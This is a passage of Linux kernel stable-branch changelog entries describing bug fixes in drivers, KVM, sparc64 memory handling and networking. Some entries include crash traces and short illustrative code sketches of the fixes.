Linus Walleij [Mon, 14 Nov 2016 14:34:17 +0000 (15:34 +0100)]
i2c: mux: fix up dependencies
commit 93d710a65ef02fb7fd48ae207e78f460bd7a6089 upstream.
We get the following build error from UM Linux after adding
an entry to drivers/iio/gyro/Kconfig that issues "select I2C_MUX":
ERROR: "devm_ioremap_resource"
[drivers/i2c/muxes/i2c-mux-reg.ko] undefined!
ERROR: "of_address_to_resource"
[drivers/i2c/muxes/i2c-mux-reg.ko] undefined!
It appears that the I2C mux core code depends on HAS_IOMEM
for historical reasons, while CONFIG_I2C_MUX_REG does *not*
have a direct dependency on HAS_IOMEM.
This creates a situation where an allyesconfig or allmodconfig
for UM Linux will select I2C_MUX, and will implicitly enable
I2C_MUX_REG as well, and the compilation will fail for the
register driver.
Fix this up by making I2C_MUX_REG depend on HAS_IOMEM and
removing the dependency from I2C_MUX.
Reported-by: kbuild test robot <fengguang.wu@intel.com>
Reported-by: Jonathan Cameron <jic23@jic23.retrosnub.co.uk>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Acked-by: Jonathan Cameron <jic23@kernel.org>
Acked-by: Peter Rosin <peda@axentia.se>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Oliver Hartkopp [Mon, 24 Oct 2016 19:11:26 +0000 (21:11 +0200)]
can: bcm: fix warning in bcm_connect/proc_register
commit deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream.
Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang this patch adds a lock_sock() protection and
a check for unsuccessful proc_create_data() in bcm_connect().
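A rough sketch of the shape described (illustrative only, not the exact patch; the field and helper names around proc_create_data() are assumed from the bcm.c conventions):
	lock_sock(sk);
	/* ... existing bcm_connect() body ... */
	if (proc_dir) {
		/* unique socket address as filename */
		sprintf(bo->procname, "%lu", sock_i_ino(sk));
		bo->bcm_proc_read = proc_create_data(bo->procname, 0644,
						     proc_dir, &bcm_proc_fops, sk);
		if (!bo->bcm_proc_read) {
			ret = -ENOMEM;	/* proc_create_data() failed */
			goto fail;	/* unwind while still holding the lock */
		}
	}
	/* ... */
	release_sock(sk);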
Reference: http://marc.info/?l=linux-netdev&m=147732648731237
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Suggested-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Azhar Shaikh [Wed, 12 Oct 2016 17:12:20 +0000 (10:12 -0700)]
mfd: intel-lpss: Do not put device in reset state on suspend
commit 274e43edcda6f709aa67e436b3123e45a6270923 upstream.
Commit 41a3da2b8e163 ("mfd: intel-lpss: Save register context on suspend") saved the register context while going to suspend and
also put the device in reset state.
Due to the resetting of the device, the system cannot enter S3/S0ix
states when the no_console_suspend flag is enabled. The system
and serial console both hang. Resetting the device is not
needed while going to suspend, so remove this code.
Fixes: 41a3da2b8e163 ("mfd: intel-lpss: Save register context on suspend")
Signed-off-by: Azhar Shaikh <azhar.shaikh@intel.com>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Reviewed-by: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Miklos Szeredi [Thu, 18 Aug 2016 07:10:44 +0000 (09:10 +0200)]
fuse: fix fuse_write_end() if zero bytes were copied
commit 59c3b76cc61d1d676f965c192cc7969aa5cb2744 upstream.
If pos is at the beginning of a page and copied is zero, then the page
is not zeroed but is still marked uptodate.
Fix by skipping everything except unlock/put of page if zero bytes were
copied.
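A minimal sketch of the described early exit, assuming a conventional ->write_end() layout (example_write_end and its page handling are illustrative, not the fuse code verbatim):
	static int example_write_end(struct page *page, loff_t pos,
				     unsigned len, unsigned copied)
	{
		if (!copied)
			goto unlock;	/* zero bytes copied: leave page state alone */

		/* ... zero the tail and SetPageUptodate(page) as before ... */
	unlock:
		unlock_page(page);
		put_page(page);
		return copied;
	}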
Reported-by: Al Viro <viro@zeniv.linux.org.uk>
Fixes: 6b12c1b37e55 ("fuse: Implement write_begin/write_end callbacks")
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Ignacio Alvarado [Fri, 4 Nov 2016 19:15:55 +0000 (12:15 -0700)]
KVM: Disable irq while unregistering user notifier
commit 1650b4ebc99da4c137bfbfc531be4a2405f951dd upstream.
Function user_notifier_unregister should be called only once for each
registered user notifier.
Function kvm_arch_hardware_disable can be executed from an IPI context
which could cause a race condition with a VCPU returning to user mode
and attempting to unregister the notifier.
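A sketch of the kind of change described, serializing the unregister against the IPI path (the smsr->urn field name is illustrative):
	unsigned long flags;

	local_irq_save(flags);		/* block kvm_arch_hardware_disable()'s IPI */
	user_return_notifier_unregister(&smsr->urn);
	local_irq_restore(flags);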
Signed-off-by: Ignacio Alvarado <ikalvarado@google.com>
Fixes: 18863bdd60f8 ("KVM: x86 shared msr infrastructure")
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Paolo Bonzini [Thu, 17 Nov 2016 14:55:46 +0000 (15:55 +0100)]
KVM: x86: fix missed SRCU usage in kvm_lapic_set_vapic_addr
commit 7301d6abaea926d685832f7e1f0c37dd206b01f4 upstream.
Reported by syzkaller:
[ INFO: suspicious RCU usage. ]
4.9.0-rc4+ #47 Not tainted
-------------------------------
./include/linux/kvm_host.h:536 suspicious rcu_dereference_check() usage!
stack backtrace:
CPU: 1 PID: 6679 Comm: syz-executor Not tainted 4.9.0-rc4+ #47
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
ffff880039e2f6d0 ffffffff81c2e46b ffff88003e3a5b40 0000000000000000
0000000000000001 ffffffff83215600 ffff880039e2f700 ffffffff81334ea9
ffffc9000730b000 0000000000000004 ffff88003c4f8420 ffff88003d3f8000
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:15
[<ffffffff81c2e46b>] dump_stack+0xb3/0x118 lib/dump_stack.c:51
[<ffffffff81334ea9>] lockdep_rcu_suspicious+0x139/0x180 kernel/locking/lockdep.c:4445
[< inline >] __kvm_memslots include/linux/kvm_host.h:534
[< inline >] kvm_memslots include/linux/kvm_host.h:541
[<ffffffff8105d6ae>] kvm_gfn_to_hva_cache_init+0xa1e/0xce0 virt/kvm/kvm_main.c:1941
[<ffffffff8112685d>] kvm_lapic_set_vapic_addr+0xed/0x140 arch/x86/kvm/lapic.c:2217
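The fix amounts to taking the kvm->srcu read side around the call; roughly (sketch, where va is the kvm_vapic_addr argument of the KVM_SET_VAPIC_ADDR ioctl):
	idx = srcu_read_lock(&vcpu->kvm->srcu);
	r = kvm_lapic_set_vapic_addr(vcpu, va.vapic_addr);
	srcu_read_unlock(&vcpu->kvm->srcu, idx);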
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Fixes: fda4e2e85589191b123d31cdc21fd33ee70f50fd
Cc: Andrew Honig <ahonig@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Reviewed-by: David Hildenbrand <david@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Yazen Ghannam [Tue, 8 Nov 2016 08:35:06 +0000 (09:35 +0100)]
x86/cpu/AMD: Fix cpu_llc_id for AMD Fam17h systems
commit b0b6e86846093c5f8820386bc01515f857dd8faa upstream.
cpu_llc_id (Last Level Cache ID) derivation on AMD Fam17h has an
underflow bug when extracting the socket_id value. It starts from 0
so subtracting 1 from it will result in an invalid value. This breaks
scheduling topology later on since the cpu_llc_id will be incorrect.
For example, the cpu_llc_id of the *other* CPU in the loops in
set_cpu_sibling_map() underflows and we're generating the funniest
thread_siblings masks and then when I run 8 threads of nbench, they get
spread around the LLC domains in a very strange pattern which doesn't
give you the normal scheduling spread one would expect for performance.
Other things like EDAC use cpu_llc_id so they will be b0rked too.
So, the APIC ID is preset in APICx020 for bits 3 and above: they contain
the core complex, node and socket IDs.
The LLC is at the core complex level so we can find a unique cpu_llc_id
by right shifting the APICID by 3 because then the least significant bit
will be the Core Complex ID.
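In code, the derivation described above boils down to something like (sketch; c is the cpuinfo_x86 of the CPU being set up):
	/* LLC == core complex; bits [3..] of the APIC ID identify the complex */
	per_cpu(cpu_llc_id, cpu) = c->apicid >> 3;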
Tested-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Yazen Ghannam <Yazen.Ghannam@amd.com>
[ Cleaned up and extended the commit message. ]
Signed-off-by: Borislav Petkov <bp@suse.de>
Acked-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Aravind Gopalakrishnan <aravindksg.lkml@gmail.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Fixes: 3849e91f571d ("x86/AMD: Fix last level cache topology for AMD Fam17h systems")
Link: http://lkml.kernel.org/r/20161108083506.rvqb5h4chrcptj7d@pd.tnic
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Greg Kroah-Hartman [Mon, 21 Nov 2016 09:06:53 +0000 (10:06 +0100)]
Linux 4.4.34
David S. Miller [Tue, 25 Oct 2016 04:25:31 +0000 (21:25 -0700)]
sparc64: Delete now unused user copy fixup functions.
[ Upstream commit 0fd0ff01d4c3c01e7fe69b762ee1a13236639acc ]
Now that all of the user copy routines are converted to return
accurate residual lengths when an exception occurs, we no longer need
the broken fixup routines.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 04:22:27 +0000 (21:22 -0700)]
sparc64: Delete now unused user copy assembler helpers.
[ Upstream commit 614da3d9685b67917cab48c8452fd8bf93de0867 ]
All of __ret{,l}_mone{_asi,_fp,_asi_fpu} are now unused.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 04:20:35 +0000 (21:20 -0700)]
sparc64: Convert U3copy_{from,to}_user to accurate exception reporting.
[ Upstream commit ee841d0aff649164080e445e84885015958d8ff4 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 03:46:44 +0000 (20:46 -0700)]
sparc64: Convert NG2copy_{from,to}_user to accurate exception reporting.
[ Upstream commit e93704e4464fdc191f73fce35129c18de2ebf95d ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 02:32:12 +0000 (19:32 -0700)]
sparc64: Convert NGcopy_{from,to}_user to accurate exception reporting.
[ Upstream commit 7ae3aaf53f1695877ccd5ebbc49ea65991e41f1e ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 01:58:05 +0000 (18:58 -0700)]
sparc64: Convert NG4copy_{from,to}_user to accurate exception reporting.
[ Upstream commit 95707704800988093a9b9a27e0f2f67f5b4bf2fa ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Mon, 15 Aug 2016 23:07:50 +0000 (16:07 -0700)]
sparc64: Convert U1copy_{from,to}_user to accurate exception reporting.
[ Upstream commit cb736fdbb208eb3420f1a2eb2bfc024a6e9dcada ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Mon, 15 Aug 2016 22:26:38 +0000 (15:26 -0700)]
sparc64: Convert GENcopy_{from,to}_user to accurate exception reporting.
[ Upstream commit d0796b555ba60c22eb41ae39a8362156cb08eee9 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Mon, 15 Aug 2016 22:08:18 +0000 (15:08 -0700)]
sparc64: Convert copy_in_user to accurate exception reporting.
[ Upstream commit 0096ac9f47b1a2e851b3165d44065d18e5f13d58 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Mon, 15 Aug 2016 21:47:54 +0000 (14:47 -0700)]
sparc64: Prepare to move to more saner user copy exception handling.
[ Upstream commit 83a17d2661674d8c198adc0e183418f72aabab79 ]
The fixup helper function mechanism for handling user copy faults
is not 100% accurate, and can never be made so.
We are going to transition the code to return the running return
length, which is always kept track of in one or more registers
of each of these routines.
In order to convert them one by one, we have to allow the existing
behavior to continue functioning.
Therefore make all the copy code that wants the fixup helper to be
used return negative one.
After all of the user copy routines have been converted, this logic
and the fixup helpers themselves can be removed completely.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Wed, 10 Aug 2016 21:41:33 +0000 (14:41 -0700)]
sparc64: Delete __ret_efault.
[ Upstream commit aa95ce361ed95c72ac42dcb315166bce5cf1a014 ]
It is completely unused.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Thu, 27 Oct 2016 16:04:54 +0000 (09:04 -0700)]
sparc64: Handle extremely large kernel TLB range flushes more gracefully.
[ Upstream commit a74ad5e660a9ee1d071665e7e8ad822784a2dc7f ]
When the vmalloc area gets fragmented, and because the firmware
mapping area sits between where modules live and the vmalloc area, we
can sometimes receive requests for enormous kernel TLB range flushes.
When this happens the cpu just spins flushing billions of pages and
this triggers the NMI watchdog and other problems.
We took care of this on the TSB side by doing a linear scan of the
table once we pass a certain threshold.
Do something similar for the TLB flush, however we are limited by
the TLB flush facilities provided by the different chip variants.
First of all we use a (mostly arbitrary) cut-off of 256K which is
about 32 pages. This can be tuned in the future.
The huge range code path for each chip works as follows:
1) On spitfire we flush all non-locked TLB entries using diagnostic
accesses.
2) On cheetah we use the "flush all" TLB flush.
3) On sun4v/hypervisor we do a TLB context flush on context 0, which
unlike previous chips does not remove "permanent" or locked
entries.
We could probably do something better on spitfire, such as limiting
the flush to kernel TLB entries or even doing range comparisons.
However that probably isn't worth it since those chips are old and
the TLB only had 64 entries.
Reported-by: James Clarke <jrtc27@jrtc27.com>
Tested-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Wed, 26 Oct 2016 17:20:14 +0000 (10:20 -0700)]
sparc64: Fix illegal relative branches in hypervisor patched TLB cross-call code.
[ Upstream commit a236441bb69723032db94128761a469030c3fe6d ]
Just like the non-cross-call TLB flush handlers, the cross-call ones need
to avoid doing PC-relative branches outside of their code blocks.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Wed, 26 Oct 2016 17:08:22 +0000 (10:08 -0700)]
sparc64: Fix instruction count in comment for __hypervisor_flush_tlb_pending.
[ Upstream commit 830cda3f9855ff092b0e9610346d110846fc497c ]
Noticed by James Clarke.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 23:23:26 +0000 (16:23 -0700)]
sparc64: Fix illegal relative branches in hypervisor patched TLB code.
[ Upstream commit b429ae4d5b565a71dfffd759dfcd4f6c093ced94 ]
When we copy code over to patch another piece of code, we can only use
PC-relative branches that target code within that piece of code.
Such PC-relative branches cannot be made to external symbols because
the patch moves the location of the code and thus modifies the
relative address of external symbols.
Use an absolute jmpl to fix this problem.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Wed, 26 Oct 2016 02:43:17 +0000 (19:43 -0700)]
sparc64: Handle extremely large kernel TSB range flushes sanely.
[ Upstream commit 849c498766060a16aad5b0e0d03206726e7d2fa4 ]
If the number of pages we are flushing is more than twice the number
of entries in the TSB, just scan the TSB table for matches rather
than probing each and every page in the range.
Based upon a patch and report by James Clarke.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
James Clarke [Mon, 24 Oct 2016 18:49:25 +0000 (19:49 +0100)]
sparc: Handle negative offsets in arch_jump_label_transform
[ Upstream commit 9d9fa230206a3aea6ef451646c97122f04777983 ]
Additionally, if the offset will overflow the immediate for a ba,pt
instruction, fall back on a standard ba to get an extra 3 bits.
Signed-off-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Mike Kravetz [Fri, 15 Jul 2016 20:08:42 +0000 (13:08 -0700)]
sparc64 mm: Fix base TSB sizing when hugetlb pages are used
[ Upstream commit af1b1a9b36b8f9d583d4b4f90dd8946ed0cd4bd0 ]
do_sparc64_fault() calculates both the base and huge page RSS sizes and
uses this information in calls to tsb_grow(). The calculation for base
page TSB size is not correct if the task uses hugetlb pages. hugetlb
pages are not accounted for in RSS, therefore the call to get_mm_rss(mm)
does not include hugetlb pages. However, the number of pages based on
huge_pte_count (which does include hugetlb pages) is subtracted from
this value. This will result in an artificially small and often negative
RSS calculation. The base TSB size is then often set to max_tsb_size
as the passed RSS is unsigned, so a negative value looks really big.
THP pages are also accounted for in huge_pte_count, and THP pages are
accounted for in RSS so the calculation in do_sparc64_fault() is correct
if a task only uses THP pages.
A single huge_pte_count is not sufficient for TSB sizing if both hugetlb
and THP pages can be used. Instead of a single counter, use two: one
for hugetlb and one for THP.
Signed-off-by: Mike Kravetz <mike.kravetz@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Dan Carpenter [Fri, 15 Jul 2016 11:17:33 +0000 (14:17 +0300)]
sparc: serial: sunhv: fix a double lock bug
[ Upstream commit 344e3c7734d5090b148c19ac6539b8947fed6767 ]
We accidentally take the "port->lock" twice in a row. This old code
was supposed to be deleted.
Fixes: e58e241c1788 ('sparc: serial: Clean up the locking for -rt')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Thu, 28 Jul 2016 00:50:26 +0000 (17:50 -0700)]
sparc: Don't leak context bits into thread->fault_address
[ Upstream commit 4f6deb8cbab532a8d7250bc09234c1795ecb5e2c ]
On pre-Niagara systems, we fetch the fault address on data TLB
exceptions from the TLB_TAG_ACCESS register. But this register also
contains the context ID associated with the fault in the low 13 bits
of the register value.
This propagates into current_thread_info()->fault_address and can
cause trouble later on.
So clear the low 13-bits out of the TLB_TAG_ACCESS value in the cases
where it matters.
Reported-by: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Peter Hurley [Fri, 27 Nov 2015 19:30:21 +0000 (14:30 -0500)]
tty: Prevent ldisc drivers from re-using stale tty fields
commit dd42bf1197144ede075a9d4793123f7689e164bc upstream.
Line discipline drivers may mistakenly misuse ldisc-related fields
when initializing. For example, a failure to initialize tty->receive_room
in the N_GIGASET_M101 line discipline was recently found and fixed [1].
Now, the N_X25 line discipline has been discovered accessing the previous
line discipline's already-freed private data [2].
Harden the ldisc interface against misuse by initializing relevant
tty fields before instantiating the new line discipline.
[1] commit fd98e9419d8d622a4de91f76b306af6aa627aa9c
Author: Tilman Schmidt <tilman@imap.cc>
Date: Tue Jul 14 00:37:13 2015 +0200
isdn/gigaset: reset tty->receive_room when attaching ser_gigaset
[2] Report from Sasha Levin <sasha.levin@oracle.com>
[ 634.336761] ==================================================================
[ 634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr ffff8800a743efd0
[ 634.339558] Read of size 4 by task syzkaller_execu/8981
[ 634.340359] =============================================================================
[ 634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected
...
[ 634.405018] Call Trace:
[ 634.405277] dump_stack (lib/dump_stack.c:52)
[ 634.405775] print_trailer (mm/slub.c:655)
[ 634.406361] object_err (mm/slub.c:662)
[ 634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236)
[ 634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279)
[ 634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1))
[ 634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447)
[ 634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567)
[ 634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879)
[ 634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607)
[ 634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613)
[ 634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188)
Cc: Tilman Schmidt <tilman@imap.cc>
Cc: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
Cc: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 10 Nov 2016 21:12:35 +0000 (13:12 -0800)]
tcp: take care of truncations done by sk_filter()
[ Upstream commit ac6e780070e30e4c35bd395acfe9191e6268bdd3 ]
With syzkaller's help, Marco Grassi found a bug in the TCP stack,
crashing in tcp_collapse().
Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.
We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq
Many thanks to syzkaller team and Marco for giving us a reproducer.
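A sketch of the first step, a trimming-aware filter wrapper that can shrink the skb but never below the TCP header (close in spirit to the patch, not a verbatim copy):
	int tcp_filter(struct sock *sk, struct sk_buff *skb)
	{
		struct tcphdr *th = (struct tcphdr *)skb->data;

		/* sk_filter may truncate, but keep at least the full TCP header */
		return sk_filter_trim_cap(sk, skb, th->doff * 4);
	}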
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Marco Grassi <marco.gra@gmail.com>
Reported-by: Vladis Dronov <vdronov@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Stephen Suryaputra Lin [Thu, 10 Nov 2016 16:16:15 +0000 (11:16 -0500)]
ipv4: use new_gw for redirect neigh lookup
[ Upstream commit 969447f226b451c453ddc83cac6144eaeac6f2e3 ]
In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().
After commit 5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never get resolved and the traffic is blackholed.
So, use the new_gw for neigh lookup.
Changes from v1:
- use __ipv4_neigh_lookup instead (per Eric Dumazet).
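Sketch of the lookup keyed on the new gateway (illustrative; rt is the affected rtable):
	n = __ipv4_neigh_lookup(rt->dst.dev, new_gw);
	if (!n)
		n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);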
Fixes: 5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 10 Nov 2016 00:04:46 +0000 (16:04 -0800)]
net: __skb_flow_dissect() must cap its return value
[ Upstream commit 34fad54c2537f7c99d07375e50cb30aa3c23bd83 ]
After Tom's patch, the thoff field could point past the end of the buffer;
this could fool some callers.
If an skb was provided, skb->len should be the upper limit.
If not, hlen is supposed to be the upper limit.
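The cap is essentially one clamp on the exit path (sketch; key_control and hlen as used inside __skb_flow_dissect()):
	/* never report a transport offset beyond the data we actually have */
	key_control->thoff = min_t(u16, key_control->thoff,
				   skb ? skb->len : hlen);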
Fixes: a6e544b0a88b ("flow_dissector: Jump to exit code in __skb_flow_dissect")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Yibin Yang <yibyang@cisco.com>
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Acked-by: Willem de Bruijn <willemb@google.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Soheil Hassas Yeganeh [Fri, 4 Nov 2016 19:36:49 +0000 (15:36 -0400)]
sock: fix sendmmsg for partial sendmsg
[ Upstream commit 3023898b7d4aac65987bd2f485cc22390aae6f78 ]
Do not send the next message in sendmmsg for partial sendmsg
invocations.
sendmmsg assumes that it can continue sending the next message
when the return value of the individual sendmsg invocations
is positive. It results in corrupting the data for TCP,
SCTP, and UNIX streams.
For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream
of "aefgh" if the first sendmsg invocation sends only the first
byte while the second sendmsg goes through.
Datagram sockets either send the entire datagram or fail, so
this patch affects only sockets of type SOCK_STREAM and
SOCK_SEQPACKET.
Fixes: 228e548e6020 ("net: Add sendmmsg socket system call")
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alexander Duyck [Fri, 4 Nov 2016 19:11:57 +0000 (15:11 -0400)]
fib_trie: Correct /proc/net/route off by one error
[ Upstream commit fd0285a39b1cb496f60210a9a00ad33a815603e7 ]
The display of /proc/net/route has had a couple of issues due to the fact that
when I originally rewrote most of fib_trie I made it so that the iterator
was tracking the next value to use instead of the current.
In addition it had an off by 1 error where I was tracking the first piece
of data as position 0, even though in reality that belonged to the
SEQ_START_TOKEN.
This patch updates the code so the iterator tracks the last reported
position and key instead of the next expected position and key. In
addition it shifts things so that all of the leaves start at 1 instead of
trying to report leaves starting with offset 0 as being valid. With these
two issues addressed this should resolve any off by one errors that were
present in the display of /proc/net/route.
Fixes: 25b97c016b26 ("ipv4: off-by-one in continuation handling in /proc/net/route")
Cc: Andy Whitcroft <apw@canonical.com>
Reported-by: Jason Baron <jbaron@akamai.com>
Tested-by: Jason Baron <jbaron@akamai.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Marcelo Ricardo Leitner [Thu, 3 Nov 2016 19:03:41 +0000 (17:03 -0200)]
sctp: assign assoc_id earlier in __sctp_connect
[ Upstream commit 7233bc84a3aeda835d334499dc00448373caf5c0 ]
sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread releases it. But Andrey
Konovalov and Dmitry Vyukov reported a use-after-free in such a
situation.
Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.
The fix is, instead of doing the read after waiting for the connect, to
do it before, which avoids this issue as the socket is still locked by then.
There should be no issue with returning the asoc id in case of failure, as
the application shouldn't rely on that number in such situations
anyway.
This issue doesn't exist in sctp_sendmsg() path.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
